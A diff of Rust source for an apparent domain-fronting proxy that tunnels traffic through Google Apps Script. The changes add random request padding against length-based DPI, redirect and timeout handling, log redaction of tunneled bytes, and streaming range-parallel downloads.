+                tracing::debug!(
+                    "h2 exit-node outer call pre-send failure: {} — falling back to h1",
+                    e
+                );
+            }
+            Err((e, RequestSent::Maybe)) => {
+                tracing::warn!(
+                    "h2 exit-node outer call post-send failure: {} — \
+                     marking non-retryable to prevent duplicating the inner request",
+                    e
+                );
+                // NonRetryable propagates back to relay()'s exit-node
+                // match arm, which will *not* fall through to the
+                // direct Apps Script path (that fall-through would
+                // re-send the outer call and could also re-trigger
+                // the inner request to the destination).
+                return Err(FronterError::NonRetryable(Box::new(e)));
+            }
+        }
+
+        let mut entry = self.acquire().await?;
+        let req_head = format!(
+            "POST {path} HTTP/1.1\r\n\
+             Host: {host}\r\n\
+             Content-Type: application/json\r\n\
+             Content-Length: {len}\r\n\
+             Accept-Encoding: gzip\r\n\
+             Connection: keep-alive\r\n\
+             \r\n",
+            path = path,
+            host = self.http_host,
+            len = payload.len(),
+        );
+        entry.stream.write_all(req_head.as_bytes()).await?;
+        entry.stream.write_all(&payload).await?;
+        entry.stream.flush().await?;
+
+        let (mut status, mut resp_headers, mut resp_body) =
+            read_http_response(&mut entry.stream).await?;
+
+        // Follow Apps Script's /exec → /macros/.../exec redirect chain
+        // (typical: 1-2 hops to script.googleusercontent.com). Mirrors
+        // the redirect handling in do_relay_once_with.
+        for _ in 0..5 {
+            if !matches!(status, 301 | 302 | 303 | 307 | 308) {
+                break;
+            }
+            let Some(loc) = header_get(&resp_headers, "location") else {
+                break;
+            };
+            let (rpath, rhost) = parse_redirect(&loc);
+            let rhost = rhost.unwrap_or_else(|| self.http_host.to_string());
+            let req = format!(
+                "GET {rpath} HTTP/1.1\r\n\
+                 Host: {rhost}\r\n\
+                 Accept-Encoding: gzip\r\n\
+                 Connection: keep-alive\r\n\
+                 \r\n",
+            );
+            entry.stream.write_all(req.as_bytes()).await?;
+            entry.stream.flush().await?;
+            let (s, h, b) = read_http_response(&mut entry.stream).await?;
+            status = s;
+            resp_headers = h;
+            resp_body = b;
+        }
+
+        // Don't return to pool — the exit-node path is rare enough that
+        // the connection-reuse semantics aren't worth replicating here.
+        drop(entry);
+
+        if status != 200 {
+            let body_txt = String::from_utf8_lossy(&resp_body)
+                .chars()
+                .take(200)
+                .collect::<String>();
+            return Err(FronterError::Relay(format!(
+                "Apps Script HTTP {} (exit-node outer call): {}",
+                status, body_txt
+            )));
+        }
+        Ok(resp_body)
+    }
+
     fn build_payload_json(
         &self,
         method: &str,
@@ -1060,7 +2915,18 @@ impl DomainFronter {
             ct,
             r: true,
         };
-        Ok(serde_json::to_vec(&req)?)
+        // Serialize via Value so we can splice in the random `_pad` field
+        // without changing RelayRequest's wire schema. Apps Script ignores
+        // unknown JSON fields, so old Code.gs deployments stay compatible
+        // — the pad is just bytes-on-the-wire that the server sees and
+        // discards.
+        let mut v = serde_json::to_value(&req)?;
+        if let Value::Object(map) = &mut v {
+            if !self.disable_padding {
+                add_random_pad(map);
+            }
+        }
+        Ok(serde_json::to_vec(&v)?)
     }
 
     // ────── Full-mode tunnel protocol ──────────────────────────────────
@@ -1076,10 +2942,14 @@ impl DomainFronter {
         sid: Option<&str>,
         data: Option<String>,
     ) -> Result<TunnelResponse, FronterError> {
-        let payload = self.build_tunnel_payload(op, host, port, sid, data)?;
+        let payload: Bytes =
+            Bytes::from(self.build_tunnel_payload(op, host, port, sid, data)?);
         let script_id = self.next_script_id();
         let path = format!("/macros/s/{}/exec", script_id);
 
+        // Skip h2 for tunnel ops — same rationale as tunnel_batch_request_to
+        // (PR #1040): tunnel ops are already single HTTP requests, h2
+        // multiplexing adds no benefit and causes 16-17s long-poll stalls.
         let mut entry = self.acquire().await?;
 
         let req_head = format!(
@@ -1127,42 +2997,55 @@ impl DomainFronter {
             resp_body = b;
         }
 
+        let resp = self.finalize_tunnel_response(&script_id, status, resp_body)?;
+        self.release(entry).await;
+        Ok(resp)
+    }
+
+    /// Validate a tunnel-protocol response (status check + Apps-Script
+    /// HTML-prefix tolerance + JSON parse). Called from the h1 path of
+    /// `tunnel_request` (h2 is skipped for tunnel ops); kept as a helper
+    /// so the parsing logic stays in one place if a transport is added.
+    fn finalize_tunnel_response(
+        &self,
+        script_id: &str,
+        status: u16,
+        resp_body: Vec<u8>,
+    ) -> Result<TunnelResponse, FronterError> {
         if status != 200 {
             let body_txt = String::from_utf8_lossy(&resp_body)
                 .chars()
                 .take(200)
                 .collect::<String>();
             if should_blacklist(status, &body_txt) {
-                self.blacklist_script(&script_id, &format!("HTTP {}", status));
+                self.blacklist_script(script_id, &format!("HTTP {}", status));
             }
             return Err(FronterError::Relay(format!(
                 "tunnel HTTP {}: {}",
                 status, body_txt
             )));
         }
-
-        // Parse tunnel response JSON
         let text = std::str::from_utf8(&resp_body)
             .map_err(|_| FronterError::BadResponse("non-utf8 tunnel response".into()))?
             .trim();
-
-        // Apps Script may prepend HTML; extract first {...}
+        // Apps Script may prepend HTML on cold-start or quota-exceeded
+        // pages; extract the first {...} block tolerantly so we don't
+        // bail on a recoverable warning frame.
         let json_str = if text.starts_with('{') {
             text
         } else {
             let start = text.find('{').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json in tunnel response: {}", &text[..text.len().min(200)]))
+                FronterError::BadResponse(format!(
+                    "no json in tunnel response: {}",
+                    &text[..text.len().min(200)]
+                ))
             })?;
             let end = text.rfind('}').ok_or_else(|| {
                 FronterError::BadResponse("no json end in tunnel response".into())
             })?;
             &text[start..=end]
         };
-
-        let resp: TunnelResponse = serde_json::from_str(json_str)?;
-
-        self.release(entry).await;
-        Ok(resp)
+        Ok(serde_json::from_str(json_str)?)
     }
 
     fn build_tunnel_payload(
@@ -1188,6 +3071,9 @@ impl DomainFronter {
         if let Some(d) = data {
             map.insert("d".into(), Value::String(d));
         }
+        if !self.disable_padding {
+            add_random_pad(&mut map);
+        }
         Ok(serde_json::to_vec(&Value::Object(map))?)
     }
 
@@ -1215,10 +3101,18 @@ impl DomainFronter {
         map.insert("k".into(), Value::String(self.auth_key.clone()));
         map.insert("t".into(), Value::String("batch".into()));
         map.insert("ops".into(), serde_json::to_value(ops)?);
-        let payload = serde_json::to_vec(&Value::Object(map))?;
+        if !self.disable_padding {
+            add_random_pad(&mut map);
+        }
+        let payload: Bytes = Bytes::from(serde_json::to_vec(&Value::Object(map))?);
 
         let path = format!("/macros/s/{}/exec", script_id);
 
+        // Skip h2 for tunnel batches. Batched ops are already coalesced
+        // into one HTTP request so h2 multiplexing adds no benefit.
+        // The h1 pool path is simpler and avoids h2-specific overhead
+        // (ready timeout, NonRetryable errors, concurrent stream
+        // contention with long-poll batches).
         let mut entry = self.acquire().await?;
 
         let req_head = format!(
@@ -1237,8 +3131,16 @@ impl DomainFronter {
         entry.stream.write_all(&payload).await?;
         entry.stream.flush().await?;
 
+        // Use the configured `request_timeout_secs` for the header read,
+        // not the hardcoded 10 s default. With Apps Script cold starts
+        // routinely landing in the 8–12 s range, the 10 s cliff was
+        // firing as a false-positive batch timeout (issue #1088), killing
+        // every in-flight tunnel session under it. The outer
+        // `tokio::time::timeout(batch_timeout, ...)` in `fire_batch`
+        // remains the authoritative bound on total batch round-trip time.
+        let batch_timeout = self.batch_timeout();
         let (mut status, mut resp_headers, mut resp_body) =
-            read_http_response(&mut entry.stream).await?;
+            read_http_response_with_header_timeout(&mut entry.stream, batch_timeout).await?;
 
         // Follow redirect chain
         for _ in 0..5 {
@@ -1251,45 +3153,99 @@ impl DomainFronter {
             );
             entry.stream.write_all(req.as_bytes()).await?;
             entry.stream.flush().await?;
-            let (s, h, b) = read_http_response(&mut entry.stream).await?;
+            let (s, h, b) =
+                read_http_response_with_header_timeout(&mut entry.stream, batch_timeout).await?;
             status = s; resp_headers = h; resp_body = b;
         }
 
+        // Route through the same `finalize_batch_response` helper the
+        // h2 path uses. This keeps the redacted-logging policy in
+        // exactly one place — the previous inline parse here logged
+        // raw payload at debug AND error level, which leaked the
+        // base64-encoded tunneled bytes (TCP/UDP packets, possibly
+        // app data or credentials) into bug-report logs. Both
+        // transports now emit only `status=` + `body_len=`, with the
+        // raw body gated behind RUST_LOG=trace.
+        let resp = self.finalize_batch_response(script_id, status, resp_body)?;
+        self.release(entry).await;
+        Ok(resp)
+    }
+
+    /// Validate and parse a batch-tunnel response body that is already
+    /// fully in hand. Used by the h2 fast path in
+    /// `tunnel_batch_request_to` and by the h1 pool path, so the status
+    /// check, JSON extraction, quota-blacklist book-keeping and redacted
+    /// logging live in one place. Diagnostic excerpts are cut by `char`,
+    /// never by byte offset, so multi-byte UTF-8 bodies cannot panic.
+    fn finalize_batch_response(
+        &self,
+        script_id: &str,
+        status: u16,
+        resp_body: Vec<u8>,
+    ) -> Result<BatchTunnelResponse, FronterError> {
         if status != 200 {
-            let body_txt = String::from_utf8_lossy(&resp_body).chars().take(200).collect::<String>();
+            let body_txt = String::from_utf8_lossy(&resp_body)
+                .chars()
+                .take(200)
+                .collect::<String>();
             if should_blacklist(status, &body_txt) {
-                self.blacklist_script(&script_id, &format!("HTTP {}", status));
+                self.blacklist_script(script_id, &format!("HTTP {}", status));
             }
-            return Err(FronterError::Relay(format!("batch tunnel HTTP {}: {}", status, body_txt)));
+            return Err(FronterError::Relay(format!(
+                "batch tunnel HTTP {}: {}",
+                status, body_txt
+            )));
         }
-
         let text = std::str::from_utf8(&resp_body)
             .map_err(|_| FronterError::BadResponse("non-utf8 batch response".into()))?
             .trim();
-
         let json_str = if text.starts_with('{') {
             text
         } else {
             let start = text.find('{').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json in batch response: {}", &text[..text.len().min(200)]))
+                FronterError::BadResponse(format!(
+                    "no json in batch response: {}",
+                    text.chars().take(200).collect::<String>()
+                ))
             })?;
             let end = text.rfind('}').ok_or_else(|| {
                 FronterError::BadResponse("no json end in batch response".into())
             })?;
             &text[start..=end]
         };
-
-        tracing::debug!("batch response body: {}", &json_str[..json_str.len().min(500)]);
-
-        let resp: BatchTunnelResponse = match serde_json::from_str(json_str) {
-            Ok(v) => v,
+        // Don't log payload content. Batch responses carry base64-encoded
+        // tunneled bytes (TCP/UDP packets, possibly app data, possibly
+        // credentials), and even at debug level a leaked log line ends
+        // up in user-shared bug reports. Status + length are sufficient
+        // for diagnosis; full body is available behind RUST_LOG=trace.
+        tracing::debug!(
+            "batch response: status={} body_len={}",
+            status,
+            json_str.len()
+        );
+        tracing::trace!(
+            "batch response body (trace only): {}",
+            json_str.chars().take(500).collect::<String>()
+        );
+        match serde_json::from_str(json_str) {
+            Ok(v) => Ok(v),
             Err(e) => {
-                tracing::error!("batch JSON parse error: {} — body: {}", e, &json_str[..json_str.len().min(300)]);
-                return Err(FronterError::Json(e));
+                // Same redaction policy on the error path. Length and
+                // the serde error message are enough to locate the
+                // parse failure (offset / unexpected-token info comes
+                // from `e` itself); the raw body is trace-only.
+                tracing::error!(
+                    "batch JSON parse error: {} (body_len={})",
+                    e,
+                    json_str.len()
+                );
+                tracing::trace!(
+                    "batch parse-error body (trace only): {}",
+                    json_str.chars().take(300).collect::<String>()
+                );
+                Err(FronterError::Json(e))
             }
-        };
-        self.release(entry).await;
-        Ok(resp)
+        }
     }
 }
 
@@ -1393,17 +3349,26 @@ fn validate_probe_range(
         return None;
     }
     let range = parse_content_range(headers)?;
-    if range.start != 0 || range.end > requested_end || !content_range_matches_body(range, body.len()) {
+    if range.start != 0 || range.end > requested_end {
         return None;
     }
-    Some(range)
+    if content_range_matches_body(range, body.len())
+        || probe_range_covers_complete_entity(range, requested_end)
+    {
+        return Some(range);
+    }
+    None
 }
 
-fn checked_stitched_range_capacity(total: u64) -> Option<usize> {
-    if total > MAX_STITCHED_RANGE_BYTES {
-        return None;
-    }
-    usize::try_from(total).ok()
+fn probe_range_covers_complete_entity(range: ContentRange, requested_end: u64) -> bool {
+    // Apps Script may decode a gzip body while preserving the origin's
+    // compressed Content-Range. For the synthetic first probe only, a
+    // 0..total-1 range within the requested chunk is enough to prove we
+    // already have the complete entity; later chunks still require exact
+    // Content-Range/body length validation in extract_exact_range_body().
+    range.start == 0
+        && range.end.saturating_add(1) >= range.total
+        && range.total <= requested_end.saturating_add(1)
 }
 
 fn extract_exact_range_body(
@@ -1446,6 +3411,19 @@ fn rewrite_206_to_200(raw: &[u8]) -> Vec<u8> {
 /// wire-level stuff) — we set Content-Length from the body we're
 /// actually shipping.
 fn assemble_full_200(src_headers: &[(String, String)], body: &[u8]) -> Vec<u8> {
+    let mut out = assemble_200_head(src_headers, body.len() as u64);
+    out.extend_from_slice(body);
+    out
+}
+
+/// Build only the `HTTP/1.1 200 OK` head block — status line, headers,
+/// and the `\r\n\r\n` terminator — with `Content-Length:
+/// declared_length`. Used by the streaming side of the range-parallel
+/// path, where the body hasn't been assembled yet but we know its
+/// total size from the probe's `Content-Range`. Matches
+/// `assemble_full_200`'s header-skip rules so the two paths produce
+/// identical headers for a given probe.
+fn assemble_200_head(src_headers: &[(String, String)], declared_length: u64) -> Vec<u8> {
     let skip = |k: &str| {
         matches!(
             k.to_ascii_lowercase().as_str(),
@@ -1467,11 +3445,322 @@ fn assemble_full_200(src_headers: &[(String, String)], body: &[u8]) -> Vec<u8> {
         out.extend_from_slice(v.as_bytes());
         out.extend_from_slice(b"\r\n");
     }
-    out.extend_from_slice(format!("Content-Length: {}\r\n\r\n", body.len()).as_bytes());
-    out.extend_from_slice(body);
+    out.extend_from_slice(format!("Content-Length: {}\r\n\r\n", declared_length).as_bytes());
     out
 }
 
+/// Rewrite only the head of a buffered HTTP/1.x response and forward
+/// the result to `writer`. The head is everything up to and including
+/// the first `\r\n\r\n`; it is passed through `transform_head`, written
+/// out, and followed by the body bytes untouched. Input with no header
+/// terminator is not treated as HTTP/1.x and is forwarded verbatim.
+/// This lets the buffered branch share the writer-based API, so callers
+/// get the same head-rewrite policy whether the response was streamed
+/// or buffered.
+async fn write_response_with_head_transform<W, F>(
+    writer: &mut W,
+    response: &[u8],
+    transform_head: &F,
+) -> std::io::Result<()>
+where
+    W: tokio::io::AsyncWrite + Unpin,
+    F: Fn(&[u8]) -> Vec<u8>,
+{
+    use tokio::io::AsyncWriteExt;
+
+    const TERMINATOR: &[u8] = b"\r\n\r\n";
+    let head_end = response.windows(TERMINATOR.len()).position(|w| w == TERMINATOR);
+    match head_end.map(|at| at + TERMINATOR.len()) {
+        // No header terminator: not HTTP/1.x, forward the bytes verbatim.
+        None => writer.write_all(response).await,
+        Some(split) => {
+            let (head, body) = response.split_at(split);
+            let rewritten = transform_head(head);
+            writer.write_all(&rewritten).await?;
+            writer.write_all(body).await
+        }
+    }
+}
+
+/// Four-way dispatch for the range-parallel response delivery in
+/// `do_relay_parallel_range_to`. Extracted as a pure function so the
+/// branching contract is unit-testable without a live `DomainFronter`,
+/// and split into an enum so the writer-based and `Vec<u8>` APIs can
+/// pick different cutoffs (which is exactly the regression that
+/// motivated PR #1043's third-round review).
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum RangeDispatch {
+    /// Stitch all chunks into a single in-memory buffer, then deliver
+    /// the response to the writer in one shot. Chunk failure falls
+    /// back to a single GET — which actually recovers when the file
+    /// fits through Apps Script's response cap.
+    Buffered,
+    /// Write the response head + probe body to the wire, then stream
+    /// each remaining chunk in order. Chunk failure truncates the
+    /// response and surfaces as a Content-Length mismatch the
+    /// download client resumes via Range. Only reachable from the
+    /// writer-based API (`streaming_allowed=true`).
+    Stream,
+    /// Fall back to a plain `self.relay()` single GET. Used by the
+    /// `Vec<u8>` compatibility wrapper when the response would
+    /// exceed the buffered stitch buffer's memory cap and the wrapper
+    /// can't take the streaming branch (a `Vec<u8>` consumer can't
+    /// react to a truncated 200 OK — Issue #162).
+    FallbackSingleGet,
+    /// Refuse the response outright with a 502. Only reachable from
+    /// the writer-based API for advertised totals above
+    /// [`MAX_STREAMED_RANGE_BYTES`]. Prevents an absurd
+    /// `Content-Range` total from turning one GET into an unbounded
+    /// stream of chunk Apps Script calls (quota drain DoS — see the
+    /// constant's doc). The compat wrapper has the lower
+    /// [`BUFFERED_STITCH_MAX_BYTES`] cliff above it, so this variant
+    /// is not reachable via `streaming_allowed=false`.
+    RejectTooLarge,
+}
+
+/// Choose the delivery strategy for a range-capable response of size
+/// `total`.
+///
+/// The two callers have different contracts:
+///   * The writer-based public API
+///     ([`DomainFronter::relay_parallel_range_to`]) passes
+///     `streaming_allowed=true`. Above [`APPS_SCRIPT_BODY_MAX_BYTES`]
+///     (40 MiB) a single-GET fallback would fail through Apps Script
+///     anyway, so it streams with truncate-and-resume instead of
+///     returning a hard 504; above [`MAX_STREAMED_RANGE_BYTES`] it
+///     refuses outright.
+///   * The `Vec<u8>` compatibility wrapper
+///     ([`DomainFronter::relay_parallel_range`]) passes
+///     `streaming_allowed=false`. It buffers up to
+///     [`BUFFERED_STITCH_MAX_BYTES`] (64 MiB) — so the 40-64 MiB band
+///     still stitches — and falls back to a single GET above that.
+fn dispatch_range_response(total: u64, streaming_allowed: bool) -> RangeDispatch {
+    match streaming_allowed {
+        // Writer API, checked from the largest threshold down. The
+        // quota-DoS guard comes first; the wrapper can never reach it
+        // because its own, lower `BUFFERED_STITCH_MAX_BYTES` (64 MiB)
+        // cliff diverts to a single GET before any chunk loop runs.
+        true if total > MAX_STREAMED_RANGE_BYTES => RangeDispatch::RejectTooLarge,
+        true if total > APPS_SCRIPT_BODY_MAX_BYTES => RangeDispatch::Stream,
+        // `Vec<u8>` wrapper: the response is too large to stitch in
+        // memory, so hand it to a plain single GET.
+        false if total > BUFFERED_STITCH_MAX_BYTES => RangeDispatch::FallbackSingleGet,
+        // Everything else, from either caller, fits the in-memory
+        // stitch buffer.
+        _ => RangeDispatch::Buffered,
+    }
+}
+
+/// Lazy iterator over the byte ranges that still need fetching after
+/// the probe. Yields inclusive `(start, end)` byte-index pairs, each
+/// ≤ `chunk_size` long, covering `(probe_end, total - 1]`.
+///
+/// Memory is `O(1)` regardless of `total`: a hostile or buggy origin
+/// advertising `Content-Range: bytes 0-262143/<huge>` can pass the
+/// probe checks but must not drive an eager `Vec<(u64, u64)>`
+/// allocation (256 KiB chunks × 100 TiB ≈ 400M tuples, ~6 GB). This
+/// laziness is what replaced PR #151's fixed `MAX_STITCHED_RANGE_BYTES`
+/// guard on the writer-based path.
+///
+/// A `chunk_size` of 0 is clamped to 1; unclamped, the cursor would
+/// never advance and the iterator would yield `(s, s - 1)` forever.
+fn plan_remaining_ranges(
+    probe_end: u64,
+    total: u64,
+    chunk_size: u64,
+) -> impl Iterator<Item = (u64, u64)> {
+    let mut start = probe_end.saturating_add(1);
+    std::iter::from_fn(move || {
+        if start >= total {
+            return None;
+        }
+        let s = start;
+        let e = (s.saturating_add(chunk_size.max(1)).saturating_sub(1)).min(total - 1);
+        start = e.saturating_add(1);
+        Some((s, e))
+    })
+}
+
+/// Streaming write loop for the range-parallel path. Writes `head`,
+/// then `probe_body`, then each chunk from `fetches` in input order
+/// (which is by-range-start since `fetch_chunks_stream` uses
+/// `buffered` to preserve order). On the first validation failure
+/// flushes the committed prefix and returns `Err`; the partial
+/// response surfaces to the download client as a truncated body
+/// (Content-Length mismatch), which most clients — curl `-C -`,
+/// browsers' built-in download manager, wget — treat as a resumable
+/// failure and reissue via Range from the partial byte count.
+///
+/// The pre-Err flush is load-bearing on TLS streams (and to a
+/// lesser extent on plain sockets with the kernel send buffer):
+/// `write_all` returns once the bytes are in the TLS writer's
+/// in-memory buffer, NOT once they've been encrypted and shipped
+/// down the socket. If we returned `Err` without flushing, the
+/// caller's `?` typically propagates the error and the connection
+/// is dropped — taking buffered ciphertext with it. The client then
+/// sees a clean connection close before any body bytes, instead of
+/// the partial body it needs to compute a resume offset.
+///
+/// Kept as a free function (no `&self`) so the streaming logic can be
+/// unit-tested with synthetic `Stream`s built from `stream::iter(…)`
+/// instead of needing a fully-constructed `DomainFronter`.
+async fn stream_chunks_to_writer<W, S>(
+    writer: &mut W,
+    head: &[u8],
+    probe_body: &[u8],
+    total: u64,
+    fetches: S,
+    url_for_log: &str,
+) -> std::io::Result<()>
+where
+    W: tokio::io::AsyncWrite + Unpin,
+    S: futures_util::Stream<Item = (u64, u64, Result<Vec<u8>, &'static str>)>,
+{
+    use futures_util::stream::StreamExt;
+    use tokio::io::AsyncWriteExt;
+
+    writer.write_all(head).await?;
+    writer.write_all(probe_body).await?;
+    // Flush head + probe body to the wire before kicking off remote
+    // chunk fetches. First bytes hit the client immediately so the
+    // browser / download manager sees the response start (status
+    // code + Content-Length, plus the first 256 KiB of body) while
+    // the Apps Script round-trips for the remaining chunks are in
+    // flight. Without this, intermediate buffering (TLS writer
+    // buffer, kernel send buffer with small initial cwnd, browsers'
+    // own pre-read thresholds) can make the progress bar sit at
+    // zero for the first several hundred ms of the download.
+    //
+    // Propagate flush errors here — if the client already
+    // disconnected, no point firing N more Apps Script calls.
+    writer.flush().await?;
+    futures_util::pin_mut!(fetches);
+
+    // Progress accounting: bytes emitted as wire body so far (the
+    // probe body, plus every successfully-written chunk). The head
+    // doesn't count — it's protocol framing, not body progress.
+    // `next_progress_log_at` is the next body-byte threshold at
+    // which we emit a progress line, advanced past the current
+    // count each time so a single large chunk crossing multiple
+    // intervals only logs once.
+    let mut body_bytes_emitted: u64 = probe_body.len() as u64;
+    let mut next_progress_log_at: u64 = STREAM_PROGRESS_LOG_INTERVAL_BYTES;
+
+    while let Some((s, e, chunk_result)) = fetches.next().await {
+        match chunk_result {
+            Ok(c) => {
+                writer.write_all(&c).await?;
+                body_bytes_emitted = body_bytes_emitted.saturating_add(c.len() as u64);
+                if body_bytes_emitted >= next_progress_log_at {
+                    // Production callers only stream for total >
+                    // APPS_SCRIPT_BODY_MAX_BYTES, but this is a free
+                    // function fed synthetic inputs in tests, so the
+                    // divisor is clamped rather than trusted.
+                    let pct = body_bytes_emitted.saturating_mul(100) / total.max(1);
+                    tracing::info!(
+                        "range-parallel-stream: {}/{} MiB ({}%) emitted for {}",
+                        body_bytes_emitted / (1024 * 1024),
+                        total / (1024 * 1024),
+                        pct,
+                        url_for_log,
+                    );
+                    // Advance to the next interval past the current
+                    // count — a chunk much larger than the interval
+                    // (shouldn't happen at 256 KiB chunks, but defend
+                    // against future tuning) skips intermediate
+                    // thresholds rather than firing N log lines back
+                    // to back.
+                    next_progress_log_at = body_bytes_emitted
+                        .saturating_add(STREAM_PROGRESS_LOG_INTERVAL_BYTES);
+                }
+            }
+            Err(reason) => {
+                tracing::warn!(
+                    "range-parallel-stream: invalid chunk {}-{} for {} ({}); truncating response",
+                    s, e, url_for_log, reason,
+                );
+                // Flush the committed prefix to the wire before
+                // declaring failure — see function doc. We
+                // deliberately ignore a flush failure here: if the
+                // socket is already broken the original
+                // chunk-validation error is still the more useful
+                // diagnosis for the caller.
+                let _ = writer.flush().await;
+                return Err(std::io::Error::other(format!(
+                    "range-parallel-stream chunk failure: {}",
+                    reason
+                )));
+            }
+        }
+    }
+    Ok(())
+}
+
+/// Glue between probe response + chunk stream + writer. Composes
+/// `assemble_200_head` (builds a synthetic 200 with
+/// `Content-Length: total`), the caller's head-transform closure
+/// (e.g. CORS injection), and `stream_chunks_to_writer` (writes the
+/// transformed head, the probe body, then each chunk in order).
+///
+/// Extracted as a free function so the streaming-branch wiring in
+/// `do_relay_parallel_range_to` is unit-testable without a live
+/// `DomainFronter`. A test can feed a synthetic probe-header set, a
+/// probe body, and a `stream::iter(…)` of canned chunk results, then
+/// inspect the bytes written to a `Vec<u8>` to assert the right
+/// composition (head → probe → chunks in order, transform_head
+/// applied to the head only, mid-stream Err propagation with the
+/// committed prefix intact).
+async fn stream_range_response_to<W, S, F>(
+    writer: &mut W,
+    probe_resp_headers: &[(String, String)],
+    probe_body: &[u8],
+    total: u64,
+    chunks_stream: S,
+    transform_head: &F,
+    url_for_log: &str,
+) -> std::io::Result<()>
+where
+    W: tokio::io::AsyncWrite + Unpin,
+    S: futures_util::Stream<Item = (u64, u64, Result<Vec<u8>, &'static str>)>,
+    F: Fn(&[u8]) -> Vec<u8>,
+{
+    let head = assemble_200_head(probe_resp_headers, total);
+    let head = transform_head(&head);
+    stream_chunks_to_writer(writer, &head, probe_body, total, chunks_stream, url_for_log).await
+}
+
+/// Tiny adapter that lets `relay_parallel_range_to` write into a
+/// `Vec<u8>` so the backward-compat `relay_parallel_range` wrapper
+/// can stay on the writer-based code path. `Vec<u8>` itself doesn't
+/// implement `tokio::io::AsyncWrite`; this just extends in-place,
+/// never fails, and never needs to block — `poll_*` immediately
+/// returns `Ready`.
+struct VecAsyncWriter<'a>(&'a mut Vec<u8>);
+
+impl tokio::io::AsyncWrite for VecAsyncWriter<'_> {
+    fn poll_write(
+        self: std::pin::Pin<&mut Self>,
+        _: &mut std::task::Context<'_>,
+        buf: &[u8],
+    ) -> std::task::Poll<std::io::Result<usize>> {
+        self.get_mut().0.extend_from_slice(buf);
+        std::task::Poll::Ready(Ok(buf.len()))
+    }
+
+    fn poll_flush(
+        self: std::pin::Pin<&mut Self>,
+        _: &mut std::task::Context<'_>,
+    ) -> std::task::Poll<std::io::Result<()>> {
+        std::task::Poll::Ready(Ok(()))
+    }
+
+    fn poll_shutdown(
+        self: std::pin::Pin<&mut Self>,
+        _: &mut std::task::Context<'_>,
+    ) -> std::task::Poll<std::io::Result<()>> {
+        std::task::Poll::Ready(Ok(()))
+    }
+}
+
 fn normalize_x_graphql_url(url: &str) -> String {
     // Split host from the rest. We accept both "x.com" and common legacy
     // forms; the Python patch only checks x.com so we do the same to be
@@ -1509,30 +3798,74 @@ fn normalize_x_graphql_url(url: &str) -> String {
     format!("{}{}{}?{}", scheme, host, path, new_query)
 }
 
-/// "YYYY-MM-DD" of the current UTC date. Used as the daily-reset
-/// boundary for `today_calls` / `today_bytes`. We format manually so
-/// this stays std-only and doesn't pull `time` or `chrono` for a
-/// ~20-line helper.
-fn current_utc_day_key() -> String {
+/// Maximum bytes of random padding appended to outbound Apps Script
+/// JSON request bodies. Picked so the per-request padding distribution
+/// (uniformly 0..MAX) shifts the body length enough to defeat naive
+/// length-fingerprint DPI without bloating bandwidth — at the average
+/// 512-byte add, on a typical 2 KB tunnel batch this is +25%, which is
+/// negligible compared to Apps Script's per-call latency floor anyway.
+/// (Issue #313, #365 Section 1 — DPI evasion.)
+const MAX_RANDOM_PAD_BYTES: usize = 1024;
+
+/// Add a `_pad` field holding a random amount of filler to a request
+/// payload just before it is serialized. The raw filler length is drawn
+/// uniformly from `0..=MAX_RANDOM_PAD_BYTES`.
+///
+/// Per the original design notes, the server side ignores unknown JSON
+/// fields, which keeps this compatible with older `Code.gs` /
+/// `CodeFull.gs` deployments.
+///
+/// The filler is base64-encoded, so it never needs JSON escaping, and
+/// because its length varies per request, body sizes spread out rather
+/// than clustering at a few peaks a length-based DPI rule could match.
+fn add_random_pad(map: &mut serde_json::Map<String, Value>) {
+    let mut rng = thread_rng();
+    let pad_len = rng.gen_range(0..=MAX_RANDOM_PAD_BYTES);
+    // A zero draw omits `_pad` altogether, so the field's presence
+    // itself varies between requests as well as its length.
+    if pad_len > 0 {
+        let mut noise = vec![0u8; pad_len];
+        rng.fill_bytes(&mut noise);
+        let encoded = B64.encode(&noise);
+        map.insert("_pad".into(), Value::String(encoded));
+    }
+}
+
+/// "YYYY-MM-DD" of the current Pacific Time date. Used as the daily-reset
+/// boundary for `today_calls` / `today_bytes` because **Apps Script's
+/// quota counter resets at midnight Pacific Time, not UTC** — that's
+/// where Google's quota bookkeeping lives. We format manually so this
+/// stays std-only and doesn't pull `time-tz` or `chrono` plus a ~3 MB
+/// IANA tzdb just for one ~50-line helper. (Issue #230, #362.)
+///
+/// PT offset depends on DST: PST = UTC-8, PDT = UTC-7. We use the
+/// stable US DST rule (2nd Sunday of March 02:00 → 1st Sunday of
+/// November 02:00 = PDT, otherwise PST). The hour-of-day boundary on
+/// transition days is approximated; this drifts by up to 1h for at
+/// most 2h/year on the spring-forward / fall-back transitions, which
+/// is fine for a daily countdown.
+fn current_pt_day_key() -> String {
     let secs = std::time::SystemTime::now()
         .duration_since(std::time::UNIX_EPOCH)
         .map(|d| d.as_secs())
         .unwrap_or(0);
-    let (y, m, d) = unix_to_ymd_utc(secs);
+    let pt_secs = unix_to_pt_seconds(secs);
+    let (y, m, d) = unix_to_ymd_utc(pt_secs);
     format!("{:04}-{:02}-{:02}", y, m, d)
 }
 
-/// Seconds until the next 00:00 UTC. Used by the UI to render a
-/// "resets in Xh Ym" countdown without the UI having to import time
-/// libraries. Conservative: if the system clock is broken we return
-/// 0 instead of a huge negative-looking number.
-fn seconds_until_utc_midnight() -> u64 {
+/// Seconds until the next 00:00 Pacific Time. Used by the UI to render
+/// a "resets in Xh Ym" countdown matching Apps Script's actual quota
+/// reset cadence (#230, #362). Conservative: if the system clock is
+/// broken we return 0 instead of a huge negative-looking number.
+fn seconds_until_pacific_midnight() -> u64 {
     let secs = std::time::SystemTime::now()
         .duration_since(std::time::UNIX_EPOCH)
         .map(|d| d.as_secs())
         .unwrap_or(0);
+    let pt_secs = unix_to_pt_seconds(secs);
     let day = 86_400u64;
-    let rem = secs % day;
+    let rem = pt_secs % day;
     if rem == 0 {
         day
     } else {
@@ -1540,6 +3873,65 @@ fn seconds_until_utc_midnight() -> u64 {
     }
 }
 
+/// Shift Unix UTC seconds by the Pacific-from-UTC offset, producing
+/// "Pacific wall-clock time expressed as if it were UTC" seconds. Pacific
+/// runs behind UTC, so the shift is a (saturating) subtraction. Feed the
+/// result to `unix_to_ymd_utc` for the PT calendar date, or take it
+/// `% 86_400` for PT seconds-into-day.
+fn unix_to_pt_seconds(utc_secs: u64) -> u64 {
+    const HOUR: u64 = 3600;
+    // Two passes break the circular dependency between "which PT date
+    // is it?" and "is DST in effect?": first derive a provisional date
